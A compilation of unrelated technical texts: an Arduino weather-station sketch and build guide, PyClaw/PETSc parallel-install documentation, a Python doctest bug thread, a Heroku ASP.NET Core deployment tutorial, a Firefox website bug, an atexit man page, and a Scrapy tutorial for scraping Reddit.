#include <Wire.h>
#include <MQ135.h>

// LCD 1602 in 4-bit mode: RS=12, E=11, D4..D7 = 5, 4, 3, 2
LiquidCrystal lcd(12, 11, 5, 4, 3, 2);
dht11 sensorTempHumid;            // DHT11 temperature/humidity sensor
MQ135 gasSensor = MQ135(A0);      // MQ135 CO2 sensor on analog pin A0

#define RZERO 76.63               // MQ135 calibration resistance
float rzero;
float ppm;

int del = 5000;                   // display refresh period, ms

// BMP085 calibration coefficients (read from the sensor's EEPROM)
const unsigned char OSS = 0;      // oversampling setting
int ac1, ac2, ac3;
unsigned int ac4, ac5, ac6;
int b1, b2, mb, mc, md;
long b5;

float temperature;
long pressure;

const float p0 = 101325;               // standard sea-level pressure, Pa
const float currentAltitude = 179.5;   // altitude of the station, m
const float ePressure = p0 * pow((1 - currentAltitude / 44330), 5.255);
float weatherDiff;

#define DHT11PIN 9                // DHT11 data pin
#define BMP085_ADDRESS 0x77       // I2C address of the BMP085

void setup() {
  lcd.begin(16, 2);
  Wire.begin();
  bmp085Calibration();
}

void loop() {
  // Read the DHT11 and report any communication error on the LCD
  int chk = sensorTempHumid.read(DHT11PIN);
  switch (chk) {
    case DHTLIB_OK:
      lcd.clear();
      break;
    case DHTLIB_ERROR_CHECKSUM:
      lcd.clear();
      lcd.print("Checksum error");
      delay(del);
      return;
    case DHTLIB_ERROR_TIMEOUT:
      lcd.clear();
      lcd.print("Time out error");
      delay(del);
      return;
    default:
      lcd.clear();
      lcd.print("Unknown error");
      delay(del);
      return;
  }

  // Temperature must be read first: it sets b5, used by the pressure math
  temperature = bmp085GetTemperature(bmp085ReadUT());
  temperature *= 0.1;                    // sensor reports 0.1 C units
  pressure = bmp085GetPressure(bmp085ReadUP());  // pressure in Pa
  weatherDiff = pressure - ePressure;    // compare in Pa (ePressure is in Pa)
  pressure *= 0.01;                      // Pa -> hPa for display

  rzero = gasSensor.getRZero();          // MQ135 calibration readout
  ppm = gasSensor.getPPM();              // CO2 concentration, ppm

  lcd.setCursor(0, 0);
  lcd.print(pressure * 3 / 4);           // hPa -> mmHg (approximately x0.75)
  lcd.print("mmHg ");
  // Crude forecast from the deviation of pressure from the altitude norm
  if (weatherDiff > 250)
    lcd.print("Sun");
  else if (weatherDiff >= -250)          // between -250 and +250 Pa
    lcd.print("Cloudy");
  else
    lcd.print("Rain");

  lcd.setCursor(0, 1);
  lcd.print(temperature, 1);
  lcd.print("C ");
  lcd.print(sensorTempHumid.humidity);
  lcd.print("% ");
  lcd.print(ppm);

  delay(del);
  lcd.clear();
}

// Read the BMP085 factory calibration coefficients from its EEPROM.
// (This routine was lost in the extracted listing; restored from the
// standard BMP085 datasheet code.)
void bmp085Calibration() {
  ac1 = bmp085ReadInt(0xAA);
  ac2 = bmp085ReadInt(0xAC);
  ac3 = bmp085ReadInt(0xAE);
  ac4 = bmp085ReadInt(0xB0);
  ac5 = bmp085ReadInt(0xB2);
  ac6 = bmp085ReadInt(0xB4);
  b1 = bmp085ReadInt(0xB6);
  b2 = bmp085ReadInt(0xB8);
  mb = bmp085ReadInt(0xBA);
  mc = bmp085ReadInt(0xBC);
  md = bmp085ReadInt(0xBE);
}

// Calculate temperature (in 0.1 C units) from the raw reading ut
short bmp085GetTemperature(unsigned int ut) {
  long x1, x2;
  x1 = (((long)ut - (long)ac6) * (long)ac5) >> 15;
  x2 = ((long)mc << 11) / (x1 + md);
  b5 = x1 + x2;
  return ((b5 + 8) >> 4);
}

// Calculate pressure (in Pa) from the raw reading up; b5 must already be set.
// (The second half of this routine was truncated in the extracted listing;
// restored from the standard BMP085 datasheet code.)
long bmp085GetPressure(unsigned long up) {
  long x1, x2, x3, b3, b6, p;
  unsigned long b4, b7;

  b6 = b5 - 4000;
  x1 = (b2 * (b6 * b6) >> 12) >> 11;
  x2 = (ac2 * b6) >> 11;
  x3 = x1 + x2;
  b3 = (((((long)ac1) * 4 + x3) << OSS) + 2) >> 2;

  x1 = (ac3 * b6) >> 13;
  x2 = (b1 * ((b6 * b6) >> 12)) >> 16;
  x3 = ((x1 + x2) + 2) >> 2;
  b4 = (ac4 * (unsigned long)(x3 + 32768)) >> 15;
  b7 = ((unsigned long)(up - b3) * (50000 >> OSS));
  if (b7 < 0x80000000)
    p = (b7 << 1) / b4;
  else
    p = (b7 / b4) << 1;

  x1 = (p >> 8) * (p >> 8);
  x1 = (x1 * 3038) >> 16;
  x2 = (-7357 * p) >> 16;
  p += (x1 + x2 + 3791) >> 4;
  return p;
}

// Read the uncompensated temperature value
unsigned int bmp085ReadUT() {
  unsigned int ut;
  Wire.beginTransmission(BMP085_ADDRESS);
  Wire.write(0xF4);
  Wire.write(0x2E);
  Wire.endTransmission();
  delay(5);
  ut = bmp085ReadInt(0xF6);
  return ut;
}

// Read the uncompensated pressure value
unsigned long bmp085ReadUP() {
  unsigned char msb, lsb, xlsb;
  unsigned long up = 0;
  Wire.beginTransmission(BMP085_ADDRESS);
  Wire.write(0xF4);
  Wire.write(0x34 + (OSS << 6));
  Wire.endTransmission();
  delay(2 + (3 << OSS));
  Wire.beginTransmission(BMP085_ADDRESS);
  Wire.write(0xF6);
  Wire.endTransmission();
  Wire.requestFrom(BMP085_ADDRESS, 3);
  while (Wire.available() < 3);   // wait for the three bytes
  msb = Wire.read();
  lsb = Wire.read();
  xlsb = Wire.read();
  up = (((unsigned long)msb << 16) | ((unsigned long)lsb << 8) | (unsigned long)xlsb) >> (8 - OSS);
  return up;
}

// Read one byte from the BMP085 at the given register address
char bmp085Read(unsigned char address) {
  Wire.beginTransmission(BMP085_ADDRESS);
  Wire.write(address);
  Wire.endTransmission();
  Wire.requestFrom(BMP085_ADDRESS, 1);
  while (!Wire.available());
  return Wire.read();
}

// Read two bytes (MSB first) from the BMP085 starting at the given address.
// (Restored: this helper was missing from the extracted listing.)
int bmp085ReadInt(unsigned char address) {
  unsigned char msb, lsb;
  Wire.beginTransmission(BMP085_ADDRESS);
  Wire.write(address);
  Wire.endTransmission();
  Wire.requestFrom(BMP085_ADDRESS, 2);
  while (Wire.available() < 2);
  msb = Wire.read();
  lsb = Wire.read();
  return (int)msb << 8 | lsb;
}
Upload this sketch to the Arduino board.
Assembling the weather station
We will make a printed circuit board to hold the components inside the case - this is the most convenient way to mount and connect the sensors. For making PCBs at home I use the "laser-iron" (toner transfer) technology, described in detail in previous articles, and etching with citric acid. We will provide places on the board for jumpers so that the sensors can be disconnected; this will be useful if you need to reprogram the microcontroller when you want to modify the program.
Solder the pressure and gas sensors in place.
To install the Arduino Nano it is convenient to use special adapters or sockets with 2.54 mm pitch. But lacking these parts, and to save space inside the case, I will install the Arduino by soldering as well.
The thermal sensor will be located at some distance from the board and will be insulated from the inside of the meteorological station using a special insulating gasket.
Provide space on our homemade board for the external power supply. I will use a regular 5-volt charger from an old broken router; its +5 V line is fed to the Vin pin of the Arduino board.
The LCD screen will be screwed directly to the front of the case and connected with Dupont-style jumper wires with quick connectors.
Install the printed circuit board inside the case and fasten it with screws. Connect the LCD screen to the Arduino's legs according to the diagram.
Carefully close the weather station housing.
Turn on the weather station
After double-checking that everything is connected correctly, we apply power to our weather station. The LCD screen should light up, and after a few seconds it will display the pressure, a small forecast based on the pressure readings, and the temperature, humidity, and carbon dioxide concentration.
Findings
We have assembled a home weather station from inexpensive and affordable components. In the process of working on a meteorological station, we became acquainted with the basics of interaction with temperature and humidity sensors, an atmospheric pressure sensor and a carbon dioxide sensor.
Running in parallel
PyClaw can be run in parallel on your desktop or on large supercomputers using the PETSc library. Running your PyClaw script in parallel is usually very easy; it mainly consists of replacing:
from clawpack import pyclaw
with:
import clawpack.petclaw as pyclaw
Also, most of the provided scripts in pyclaw/examples are set up to run in parallel simply by passing the command-line option use_petsc=True (of course, you will need to launch them with mpirun).
Installing PETSc
First make sure you have a working install of PyClaw. For PyClaw installation instructions, see installation.
To run in parallel you'll need PETSc and petsc4py, installed as described below.
Obtaining PETSc:
PETSc 3.3 can be obtained using three approaches; here we use Mercurial to get it. See the PETSc website for more information.
Do:
$ cd path/to/the/dir/where/you/want/download/Petsc-3.3
$ hg clone petsc-3.3
$ hg clone petsc-3.3/config/BuildSystem
For sh, bash, or zsh shells add the following lines to your shell start-up file:
$ export PETSC_DIR=path/to/the/dir/where/you/downloaded/Petsc-3.3/petsc-3.3
$ export PETSC_ARCH=your/architecture
whereas for csh/tcsh shells add the following lines to your shell start-up file:
$ setenv PETSC_DIR path/to/the/dir/where/you/downloaded/Petsc-3.3/petsc-3.3
$ setenv PETSC_ARCH your/architecture
For more information about PETSC_DIR and PETSC_ARCH, i.e. the variables that control the configuration and build process of PETSc, please consult the PETSc documentation.
Then, if you want PETSc-3.3 configured for 32-bit, use the following command:
$ ./config/configure.py --with-cc=gcc --with-cxx=g++ --with-python=1 --download-mpich=1 --with-shared-libraries=1
whereas, if you want PETSc-3.3 64-bit do:
$ ./config/configure.py --with-cc=gcc --with-cxx=g++ --with-python=1 --download-mpich=1 --with-shared-libraries=1 --with-64-bit-indices=1
Note that one of the options is --download-mpich=1. This means that mpich is downloaded. If you do not need/want mpich, remove this option. Note that you need MPI when using PETSc. Therefore, if the option --download-mpich=1 is removed, you should have MPI installed on your system or in your user account.
Once the configuration phase is completed, build PETSc libraries with
$ make PETSC_DIR=path/to/the/dir/where/you/have/Petsc-3.3/petsc-3.3 PETSC_ARCH=your/architecture all
Check if the libraries are working by running
$ make PETSC_DIR=path/to/the/dir/where/you/have/Petsc-3.3/petsc-3.3 PETSC_ARCH=your/architecture test
Obtaining petsc4py:
petsc4py is a python binding for PETSc. We recommend installing petsc4py 3.3 because it is compatible with PETSc 3.3 and 3.2. To install this binding correctly make sure that the PETSC_DIR and PETSC_ARCH are part of your shell start-up file.
Obtain petsc4py-3.3 with mercurial:
$ cd path/to/the/dir/where/you/want/download/petsc4py $ hg clone -r 3.3
The preferred method for the petsc4py installation is pip:
$ cd petsc4py-3.3
$ pip install . --user
Indeed, pip removes the old petsc4py installation, downloads the new version of cython (if needed) and installs petsc4py.
To check petsc4py-3.3 installation do:
$ cd petsc4py-3.3/test
$ python runtests.py
All the test cases should pass, i.e. OK should be printed on the screen.
NOTE: To run a python code that uses petsc4py in parallel you will need to use the mpiexec or mpirun commands. It is important to remember to use the mpiexec or mpirun executables that come with the MPI installation that was used for configuring the PETSc installation. If you have used the option --download-mpich=1 while installing PETSc, then the correct mpiexec to use is the one in ${PETSC_DIR}/${PETSC_ARCH}/bin. You can set this mpiexec to be your default by adding this line to your sh, bash, or zsh shell start-up file:
$ export PATH="${PETSC_DIR}/${PETSC_ARCH}/bin:${PATH}"
or this line in case you are using csh or tcsh shells:
$ setenv PATH "${PETSC_DIR}/${PETSC_ARCH}/bin:${PATH}"
You can test that you are using the right mpiexec by running a demonstration script that can be found in $PYCLAW/demo as follows:
$ cd $PYCLAW
$ mpiexec -n 4 python demo/petsc_hello_world.py
and you should get output that looks as follows:
Hello World! From process 3 out of 4 process(es).
Hello World! From process 1 out of 4 process(es).
Hello World! From process 0 out of 4 process(es).
Hello World! From process 2 out of 4 process(es).
NOTE: An alternative way to install petsc4py is simply using the python script setup.py inside petsc4py, i.e.
$ cd petsc4py-dev
$ python setup.py build
$ python setup.py install --user
Testing your installation
If you don’t have it already, install nose
$ easy_install nose
Now simply execute
$ cd $PYCLAW
$ nosetests
If everything is set up correctly, this will run all the regression tests (which include pure python code and python/Fortran code) and inform you that the tests passed. If any fail, please post the output and details of your platform on the claw-users Google group.
Running and plotting an example
$ cd $PYCLAW/examples/advection/1d/constant
$ python advection.py use_petsc=True iplot=1
This will run the code and then place you in an interactive plotting shell. To view the simulation output frames in sequence, simply press ‘enter’ repeatedly. To exit the shell, type ‘q’. For help, type ‘?’ or see this Clawpack interactive python plotting help page.
Tips for making your application run correctly in parallel
Generally serial PyClaw code should “just work” in parallel, but if you are not reasonably careful it is certainly possible to write serial code that will fail in parallel.
Most importantly, use the appropriate grid attributes. In serial, both grid.n and grid.ng give you the dimensions of the grid (i.e., the number of cells in each dimension). In parallel, grid.n contains the size of the whole grid, while grid.ng contains just the size of the part that a given process deals with. You should typically use only grid.ng (you can also use q.shape[1:], which is equal to grid.ng).
Similarly, grid.lower contains the lower bounds of the problem domain in the computational coordinates, whereas grid.lowerg contains the lower bounds of the part of the grid belonging to the current process. Typically you should use grid.lowerg.
Additionally, be aware that when a Grid object is instantiated in a parallel run, it is not instantiated as a parallel object. A typical code excerpt looks like
>>> import clawpack.petclaw as pyclaw
>>> from clawpack import pyclaw
>>> mx = 320; my = 80
>>> x = pyclaw.Dimension('x',0.0,2.0,mx)
>>> y = pyclaw.Dimension('y',0.0,0.5,my)
>>> grid = pyclaw.Domain([x,y])
At this point, grid.ng is identically equal to grid.n, rather than containing the size of the grid partition on the current process. Before using it, you should instantiate a State object
>>> num_eqn = 5
>>> num_aux = 1
>>> state = pyclaw.State(grid,num_eqn,num_aux)
Now state.grid.ng contains appropriate information.
Passing options to PETSc
The built-in applications (see Working with PyClaw’s built-in examples) are set up to automatically pass command-line options starting with a dash (“-“) to PETSc.
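For example, a hypothetical invocation combining a PyClaw option with a PETSc one (-log_summary is PETSc 3.3's built-in profiling flag) might look like:

$ mpiexec -n 4 python advection.py use_petsc=True -log_summary

Everything starting with a dash is forwarded to PETSc, while the key=value pairs are consumed by PyClaw itself.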
Created on 2007-09-05 10:53 by danilo, last changed 2009-02-15 04:47 by steven.daprano. This issue is now closed.
Seems like doctest won't recognize that functions inside the module under
test are actually in that module, if the function is decorated by a
decorator that wraps the function in an externally defined function,
such as in this silly example:
# decorator.py
import functools

def simplelog(f):
    @functools.wraps(f)
    def new_f(*args, **kwds):
        print "Wrapper calling func"
        return f(*args, **kwds)
    return new_f

# test.py
from decorator import simplelog

@simplelog
def test():
    """
    This test should fail, since the decorator prints output.
    Seems I don't get called though

    >>> test()
    'works!'
    """
    return "works!"

if __name__ == '__main__':
    import doctest
    doctest.testmod()
--
The problem lies in DocTestFinder._from_module, which checks if the
function's func_globals attribute is the same as the module's __dict__
attribute.
I'd propose to do the __module__/inspect.getmodule() checks (aren't they
both checking the same thing btw?) before the inspect.isfunction check.
Here's a patch that alters the order of checks in DocTestFinder._from_module
I applied this patch to my trunk sandbox. It seems to solve the problem
I just encountered where doctests are hidden in decorated functions &
tests pass. Checked in as r67277. Should be backported to 2.6 and
forward ported to 3.0.
For what it's worth, this bug appears to go back to at least Python 2.4,
and it affects functions using decorators even if they are defined in
the same module as the decorated function. I've applied the patch to my
2.4 installation, and it doesn't fix the issue. I'd like to request this
be reopened, because I don't believe the patch works as advertised.
I've attached a simple script which should demonstrate the issue. Run it
with "python doctestfail.py [-v]", and if it passes with no failures,
the bug still exists. I've tested it on 2.4 before and after the patch.
(Apologies for not having anything more recent at the moment.)
Earlier I wrote:
"I've applied the patch to my 2.4 installation, and it doesn't fix the
issue. I'd like to request this be reopened, because I don't believe the
patch works as advertised."
Nevermind, I withdraw the request. I believe I was misled due to the
decorated function not having its docstring automatically copied from
the original without the use of functools.wraps().
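(Editor's illustration, not part of the tracker thread: the difference the last comment describes comes down to whether the wrapper carries the original docstring, since doctest only ever sees the wrapper.)

import functools

def plain(f):
    def new_f(*args, **kwds):
        return f(*args, **kwds)
    return new_f            # new_f.__doc__ is None: the doctest vanishes

def wrapped(f):
    @functools.wraps(f)
    def new_f(*args, **kwds):
        return f(*args, **kwds)
    return new_f            # __doc__ (and the doctest) copied over from f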
# Practicalities of deploying dockerized ASP.NET Core application to Heroku
### Intro
.NET is a relative newcomer in the open-source world, and its popularity is nowhere near mainstream platforms like Node.js. So you can imagine there are few tutorials that deal with .NET and frameworks such as ASP.NET on Heroku, and those that do probably won't use containers.

Do you see C#/.NET here? Yes, me neither.
### Getting started
This tutorial will assume you have Docker, .NET Core and Heroku tools installed. I will use Linux (Ubuntu), but AFAIK those tools are cross-platform so the steps will be the same for any supported OS.
Let's take the easiest case — simple MVC app. If you don't have one, just create it by running
```
dotnet new mvc --name mymvc
```
I'll also assume you have a dockerfile ready, maybe something like the one proposed in [this tutorial](https://docs.docker.com/engine/examples/dotnetcore/):
```
FROM mcr.microsoft.com/dotnet/core/sdk:2.2 AS builder
WORKDIR /sources
COPY *.csproj .
RUN dotnet restore
COPY . .
RUN dotnet publish --output /app/ --configuration Release
FROM mcr.microsoft.com/dotnet/core/aspnet:2.2
WORKDIR /app
COPY --from=builder /app .
CMD ["dotnet", "MyMvc.dll"]
```
Note how ENTRYPOINT was substituted with CMD — more on that later.
So, cd to your app's folder and let's begin.
1. Login to Heroku container registry.
```
heroku container:login
```
2. If you don't have an existing git repo, `git init` a new one
3. Run `heroku create` to create a new app, note the git repo address provided, e.g.
```
Creating salty-fortress-4191... done, stack is heroku-16
https://salty-fortress-4191.herokuapp.com/ | https://git.heroku.com/salty-fortress-4191.git
```
4. (Optional) Check that you have heroku remote by running `git remote -v`
5. Tell Heroku to use containers:
```
heroku stack:set container
```
6. Create heroku.yml file. Minimalistic version is something like:
```
build:
  docker:
    web: Dockerfile
```
7. By default ASP.NET Core runs on ports 5000 and 5001 (HTTPS). Heroku won't allow that. If you try running it as-is, Kestrel won't start, throwing an exception:
```
System.Net.Sockets.SocketException (13): Permission denied
```
Heroku seems to allow your app to listen only on the port specified in the `$PORT` environment variable. So you need to ensure your app listens on that, rather than the default one. In case you're using the default app, just substitute `CreateWebHostBuilder` with the following one in `Program.cs`:
```
public static IWebHostBuilder CreateWebHostBuilder(string[] args)
{
    var port = Environment.GetEnvironmentVariable("PORT");
    return WebHost.CreateDefaultBuilder(args)
        .UseStartup<Startup>()
        .UseUrls("http://*:" + port);
}
```
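One practical tweak (my addition, not from the original post): locally `$PORT` is usually unset, which would leave `UseUrls` with an empty port, so a fallback keeps the app runnable outside Heroku:

```
public static IWebHostBuilder CreateWebHostBuilder(string[] args)
{
    // Fall back to 5000 when $PORT is unset (e.g. local development).
    var port = Environment.GetEnvironmentVariable("PORT") ?? "5000";
    return WebHost.CreateDefaultBuilder(args)
        .UseStartup<Startup>()
        .UseUrls("http://*:" + port);
}
```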
8. Commit everything:
```
git add . && git commit -m 'Meaningful commit message'
```
9. Now push the code to get container built and released (fingers crossed):
```
git push heroku master
```
Now remember when ENTRYPOINT was substituted with CMD in the dockerfile? We don't pass any arguments to the container, so `ENTRYPOINT ["dotnet", "MyMvc.dll"]` and `CMD ["dotnet", "MyMvc.dll"]` should behave similarly. But if you leave ENTRYPOINT, you'll get an error:

What a great error — "Unexpected fomation update response status"! Really tells you the root of the problem.
The real problem is that when using the minimalist `heroku.yml` that I showed above, Heroku will expect a CMD instruction in your dockerfile. When you add it, everything should work just fine.
### Conclusion
Now you should have some idea how to deploy simple ASP.NET Core apps to Heroku. Is it intuitive? Absolutely not. Is Heroku the best platform to host your .NET apps? Probably not. But as it's easy to sign up there and the most basic plan is free, you might want to host something there, just for fun.
### References
1. <https://devcenter.heroku.com/articles/container-registry-and-runtime>
2. <https://devcenter.heroku.com/articles/build-docker-images-heroku-yml>
3. <https://docs.docker.com/engine/examples/dotnetcore/> (Dockerfile)
Update /new/ headline to match /choose/
Status: VERIFIED FIXED
(Reporter: ckprice, Assigned: espressive)
Attachments: (1 attachment)
In bug 1205357, we developed a campaign download page[0]. This bug is opened to update the headline on /new/ to match that page. The reason is that we want to create a consistent message for users who may have seen some of our ad executions and come to the /new/ page via organic search or directly. cmore adds further benefits[1] of making it par for the course to always update /new/ to match any campaign headlines moving forward.

The headline is: Take Control. Choose Firefox. And it's localized on /choose/. There is a bit of complexity here as we would like to move over the localizations from /choose/.

[0] [1] cmore re: this headline, and moving forward: My general opinion is that we should be keeping alignment in our messages, voice, and copy across all touch-points, regardless of whether the audience is someone who is attributed to a campaign or not. This came up during our onboarding summit: we have lots of carry-over messages and themes from past campaigns lingering around over time, and people stumble upon them. Given that 90% of our campaign visitors are being acquired via view-through conversions, that means they are simply searching on "firefox" or going to firefox.com, and they see the personal/independent messages on the Firefox download page instead of the "Take Control" theme.
Assignee: nobody → schalk.neethling.bugs
Whiteboard: [kb=1895778]
:flod Currently the /new page's headline block looks as follows:

{% if LANG == 'en-US' %}
  {# L10n: Line break below for visual formatting only. #}
  {{ _('When it’s personal,<br>choose Firefox.') }}
{% elif l10n_has_tag('fx10_independent') %}
  {{ _('Choose Independent.') }} <br> {{ _('Choose Firefox.') }}
{% else %}
  {{_('Committed to you, your privacy and an open Web')}}
{% endif %}

Seeing that the headline text we want to change it to now is localized, we obviously do not want to stick it into the LANG == 'en-US' conditional. So, I am thinking the above would become:

{% if l10n_has_tag('tracking_protection') %}
  {# L10n: Line break below for visual formatting only. #}
  { _('Take Control.<br> Choose Firefox.') }}
{% elif l10n_has_tag('fx10_independent') %}
  {{ _('Choose Independent.') }} <br> {{ _('Choose Firefox.') }}
{% else %}
  {{_('Committed to you, your privacy and an open Web')}}
{% endif %}

Do you agree? Can we clean the tags up more? Thanks!
Flags: needinfo?(francesco.lodolo)
There is a syntax error in the above :-/ Should be: {{ _('Take Control.<br> Choose Firefox.') }}
Sounds good to me.
Flags: needinfo?(francesco.lodolo)
Created attachment 8687071 [details] [review] Link to Github pull-request:
Commits pushed to master:
Fix Bug 1224299, update /new headline to match that of /choose
Merge pull request #3560 from schalkneethling/bug1224299-update-new-page-headline-to-match-choose
Fix Bug 1224299, update /new headline to match that of /choose
Status: NEW → RESOLVED
Last Resolved: 3 years ago
Resolution: --- → FIXED
Verified FIXED: headlines of "Take Control. Choose Firefox." exist and match on both /new/ and /choose/.
Status: RESOLVED → VERIFIED
NAME

atexit - register a function to run at process termination

SYNOPSIS

#include <stdlib.h>

int atexit(void (*func)(void));

DESCRIPTION
The atexit() function registers the function pointed to by func to be called without arguments. At normal process termination, functions registered by atexit() are called in the reverse order to that in which they were registered. Normal termination occurs either by a call to exit() or a return from main().
At least 32 functions can be registered with atexit().
After a successful call to any of the exec functions, any functions previously registered by atexit() are no longer registered.
RETURN VALUE

Upon successful completion, atexit() returns 0. Otherwise, it returns a non-zero value.

ERRORS

None.

SEE ALSO

exit(), sysconf(), <stdlib.h>.

DERIVATION

Derived from the ANSI C standard.
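For illustration, a minimal usage sketch (an addition, not part of the original page):

#include <stdio.h>
#include <stdlib.h>

/* Registered handlers run in reverse order of registration
   at normal process termination. */
static void bye(void)
{
    printf("goodbye\n");
}

int main(void)
{
    if (atexit(bye) != 0) {
        fprintf(stderr, "atexit registration failed\n");
        return EXIT_FAILURE;
    }
    return EXIT_SUCCESS;  /* returning from main() triggers bye() */
}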
Contributed by Daniel Donohue. Daniel took the NYC Data Science Academy 12-week full-time Data Science Bootcamp program between Sept 23 and Dec 18, 2015. This post was based on his third class project (due in the 6th week of the program).
For our third project here at NYC Data Science, we were tasked with writing a web scraping script in Python. Since I spend (probably too much) time on Reddit, I decided that it would be the basis for my project. For the uninitiated, Reddit is a content-aggregator, where users submit text posts or links to thematic subforums (called "subreddits"), and other users vote them up or down and comment on them. With over 36 million registered users and nearly a million subreddits, there is a lot of content to scrape.
I selected ten subreddits---five of the top subreddits by number of subscribers and five of my personal favorites---and scraped the top post titles, links, date and time of the post, number of votes, and the top rated comment on the comment page for that post. The ten subreddits were /r/circlejerk, /r/FloridaMan, /r/gaming, /r/movies, /r/science, /r/Seahawks, /r/totallynotrobots, /r/uwotm8, /r/videos, and /r/worldnews.
There are many Python packages that would be adequate for this project, but I ended up using Scrapy. It seemed to be the most versatile among the different options, and it provided easy support for exporting scraped data to a database. Once I had the data stored in a database, I wrote the post title and top comment to txt files, and used the wordcloud module to generate word clouds for each of the subreddits.
When you start a new project, Scrapy creates a directory with a number of files. Each of these files rely on one another. The first file, items.py, defines containers that will store the scraped data:
from scrapy import Item, Field

class RedditItem(Item):
    subreddit = Field()
    link = Field()
    title = Field()
    date = Field()
    vote = Field()
    top_comment = Field()
Once filled, the item essentially acts as a Python dictionary, with the keys being the names of the fields, and the values being the scraped data corresponding to those fields.
The next file is the one that does all the heavy lifting---the file defining a Spider class. A Spider is a Python class that Scrapy uses to define what pages to start at, how to navigate them, and how to parse their contents to extract items. First, we have to import the modules we use in the definition of the Spider class:
import re
from bs4 import BeautifulSoup
from scrapy import Spider, Request
from reddit.items import RedditItem
The first two imports are merely situational; we'll use regex to get the name of the subreddit and BeautifulSoup to extract the text of the top comment. Next, we import spider.Spider, from which our Spider will inherit, and spider.Request, which represents the HTTP requests the Spider makes. Finally, we import the Item class we defined in items.py.
The next task is to give our Spider a place to start crawling.
class RedditSpider(Spider):
    name = 'reddit'
    allowed_domains = ['reddit.com']
    # the literal URLs were lost in extraction; they pointed at the ten
    # subreddits listed above, reconstructed here:
    start_urls = ['http://www.reddit.com/r/circlejerk/',
                  'http://www.reddit.com/r/gaming/',
                  'http://www.reddit.com/r/FloridaMan/',
                  'http://www.reddit.com/r/movies/',
                  'http://www.reddit.com/r/science/',
                  'http://www.reddit.com/r/Seahawks/',
                  'http://www.reddit.com/r/totallynotrobots/',
                  'http://www.reddit.com/r/uwotm8/',
                  'http://www.reddit.com/r/videos/',
                  'http://www.reddit.com/r/worldnews/']
The attribute allowed_domains limits the domains the Spider is allowed to crawl; start_urls is where the Spider will start crawling. Next, we define a parse method, which will tell the Spider what to do on each of the start_urls. Here is the first part of this method's definition:
def parse(self, response):
    links = response.xpath('//p[@class="title"]/a[@class="title may-blank "]/@href').extract()
    titles = response.xpath('//p[@class="title"]/a[@class="title may-blank "]/text()').extract()
    dates = response.xpath('//p[@class="tagline"]/time[@class="live-timestamp"]/@title').extract()
    votes = response.xpath('//div[@class="midcol unvoted"]/div[@class="score unvoted"]/text()').extract()
    # a similar extraction, lost from this excerpt, collected the
    # comment-page links for each post into a list named `comments`
This uses XPath to select certain parts of the HTML document. In the end, links is a list of the links for each post, titles is a list of all the post titles, etc. Corresponding elements of the first four of these lists will fill some of the fields in each instance of a RedditItem, but the top_comment field needs to be filled on the comment page for that post. One way to approach this is to partially fill an instance of RedditItem, store this partially filled item in the metadata of a Request to a comment page, and then use a second method to fill the top_comment field on the comment page. This part of the parse method's definition achieves this:
    for i, link in enumerate(comments):
        item = RedditItem()
        item['subreddit'] = str(re.findall('/r/[A-Za-z]*8?', link))[3:len(str(re.findall('/r/[A-Za-z]*8?', link))) - 2]
        item['link'] = links[i]
        item['title'] = titles[i]
        item['date'] = dates[i]
        if votes[i] == u'\u2022':
            item['vote'] = 'hidden'
        else:
            item['vote'] = int(votes[i])
        request = Request(link, callback=self.parse_comment_page)
        request.meta['item'] = item
        yield request
For the ith link in the list of comment urls, we create an instance of RedditItem, fill the subreddit field with the name of the subreddit (extracted from the comment url with the use of regular expressions), the link field with the ith link, the title field with the ith title, etc. Then, we create a request to the comment page with the instruction to send it to the method parse_comment_page, and store the partially filled item temporarily in this request's metadata. The method parse_comment_page tells the Spider what to do with this:
def parse_comment_page(self, response):
    item = response.meta['item']
    top = response.xpath('//div[@class="commentarea"]//div[@class="md"]').extract()[0]
    top_soup = BeautifulSoup(top, 'html.parser')
    item['top_comment'] = top_soup.get_text().replace('\n', ' ')
    yield item
Again, XPath specifies the HTML to extract from the comment page, and in this case, BeautifulSoup removes HTML tags from the top comment. Then, finally, we fill the last part of the item with this text and yield the filled item to the next step in the scraping process.
The next step is to tell Scrapy what to do with the extracted data; this is done in the item pipeline. The item pipeline is responsible for processing the scraped data, and storing the item in a database is a typical such process. We chose to store the items in a MongoDB database, which is a document-oriented database (in contrast with the more traditional table-based relational database structure). Strictly speaking, a relational database would have sufficed, but MongoDB has a more flexible data model, which could come in use if I decide to expand on this project in the future. First, we have to specify the database settings in settings.py (another file initially created by Scrapy):
BOT_NAME = 'reddit'
SPIDER_MODULES = ['reddit.spiders']
NEWSPIDER_MODULE = 'reddit.spiders'
DOWNLOAD_DELAY = 2
ITEM_PIPELINES = {'reddit.pipelines.DuplicatesPipeline':300,
'reddit.pipelines.MongoDBPipeline':800, }
MONGODB_SERVER = "localhost"
MONGODB_PORT = 27017
MONGODB_DB = "reddit"
MONGODB_COLLECTION = "post"
The delay is there to avoid violating Reddit's terms of service. So, now we've set up a Spider to crawl and parse the HTML, and we've set up our database settings. Now we need to connect the two in pipelines.py:
import pymongo
from scrapy.conf import settings
from scrapy.exceptions import DropItem
from scrapy import log

class DuplicatesPipeline(object):
    def __init__(self):
        self.ids_seen = set()

    def process_item(self, item, spider):
        if item['link'] in self.ids_seen:
            raise DropItem("Duplicate item found: %s" % item)
        else:
            self.ids_seen.add(item['link'])
            return item

class MongoDBPipeline(object):
    def __init__(self):
        # (this class header and __init__ were garbled in extraction;
        # reconstructed from the MONGODB_* settings defined above)
        connection = pymongo.MongoClient(settings['MONGODB_SERVER'],
                                         settings['MONGODB_PORT'])
        db = connection[settings['MONGODB_DB']]
        self.collection = db[settings['MONGODB_COLLECTION']]

    def process_item(self, item, spider):
        valid = True
        for data in item:
            if not data:
                valid = False
                raise DropItem("Missing {0}!".format(data))
        if valid:
            self.collection.insert(dict(item))
            log.msg("Added to MongoDB database!",
                    level=log.DEBUG, spider=spider)
        return item
The first class is used to check if a link has already been added, and skips processing that item if it has. The second class defines the data persistence. The first method in MongoDBPipeline actually connects to the database (using the settings we've defined in settings.py), and the second method processes the data and adds it to the collection. In the end, our collection is filled with documents holding the subreddit, link, title, date, vote, and top_comment fields.
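With the items, spider, settings, and pipeline in place, the crawl is started from the project directory with Scrapy's command-line tool (the spider's name attribute is 'reddit'):

scrapy crawl reddit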
The real work was done in actually scraping the data. Now, we want to use it to create visualizations of frequently used words across the ten subreddits. The Python module wordcloud does just this: it takes a plain text file and generates word clouds like the one you see above, and with very little effort. The first step is to write the post titles and top comments to text files.
import sys
import pymongo
reload(sys)
sys.setdefaultencoding('UTF8')
client = pymongo.MongoClient()
db = client.reddit
